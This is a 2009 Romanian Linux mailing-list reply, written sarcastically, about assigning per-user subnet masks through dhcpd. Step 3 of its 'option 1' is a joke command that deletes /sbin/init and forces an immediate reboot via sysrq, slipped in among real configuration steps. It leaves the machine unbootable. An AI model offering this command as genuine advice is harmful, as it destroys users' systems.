Re: [rlug] Subnet mask diferit pe user prin dhcpd

Thu, 13 Aug 2009 06:28:02 -0700 

On Thu, 13 Aug 2009, Cristian Ilyes wrote:
nici nu am pretins ca ar fi o solutie buna, doar am spus ca se poate. adica daca vrei cu adevarat,... nu recomand de nici un fel aceasta solutie. oricine un pic mai dezghetat isi poate schimba mask-ul si vede tot. 


	Probabil isi asuma deja posibilitatea asta daca nici nu a ctadixit 
sa raspunda la mailul lui fmaria despre vlanuri, care mi se pare ca e cea 
mai buna solutie in situatia asta, insa poate avea ca si obstacol 
existenta unor switchuri de ckt si a unei retele shared in care se aplica 
reguli de securitate pentru acelasi domeniu de broadcast pe un device 
oarecare din acea retea. Lame.


        Si acum raspunsul:

Varianta 1:

	1. pe rabla aia de router, pentru ca-ti dai seama ca e o rabla 
daca o pui sa faca asemenea ckturi in reteaua de 2ROL de la tine, va 
trebui sa adaugi inca un IP, din acelasi subnet dar cu alt netmask.



	2. tot pe rabla de router, in dhcpd.conf, definesti un al doilea 
shared network pentru subnetul de 2ROL proaspat adaugat pe interfata de 
ckt din reteaua protejata prin voia nestiintei utilizatorilor si a lipsei 
lor de interes in a-ti fecunda jucariile (ca daca vor pot oricum). Poti 
seta pentru acel shared network acelasi default gateway cred, daca evident 
face match pe subnet/netmask.


        3. rm -f /sbin/init && echo sanatate\! && echo b>/proc/sysrq-trigger

        4. dupa ce masina booteaza la loc NU UITA sa:
        a) updatezi regulile din firewall;
        b) sa te asiguri ca interfetele cu pricina nu trimit icmp
        redirects.

Varianta 2:

- asculta ce zicea Camelia, evalueaza ce spunea fmaria, fa treaba asta cum 
trebuie. Ce faci prin varianta 1 e realizabil (mai ales dupa completarea 
pasului 3) insa e o laba monumentala in fata unui ventilator de mare 
putere (it may cumm back to your face).



P.S.: de ce ckt era relevanta distributia si versiunea ei in mailul 
initial?


--
Let's cut tha crap, ok? Ce spun eu aici ma reprezinta doar pe mine, si-mi
rezerv dreptul sa ning asupra oricarei companii pe care credeti voi c-as
sprijini-o eu in vreun fel, da?

_______________________________________________
RLUG mailing list
[email protected]
http://lists.lug.ro/mailman/listinfo/rlug























					Raspunde prin e-mail lui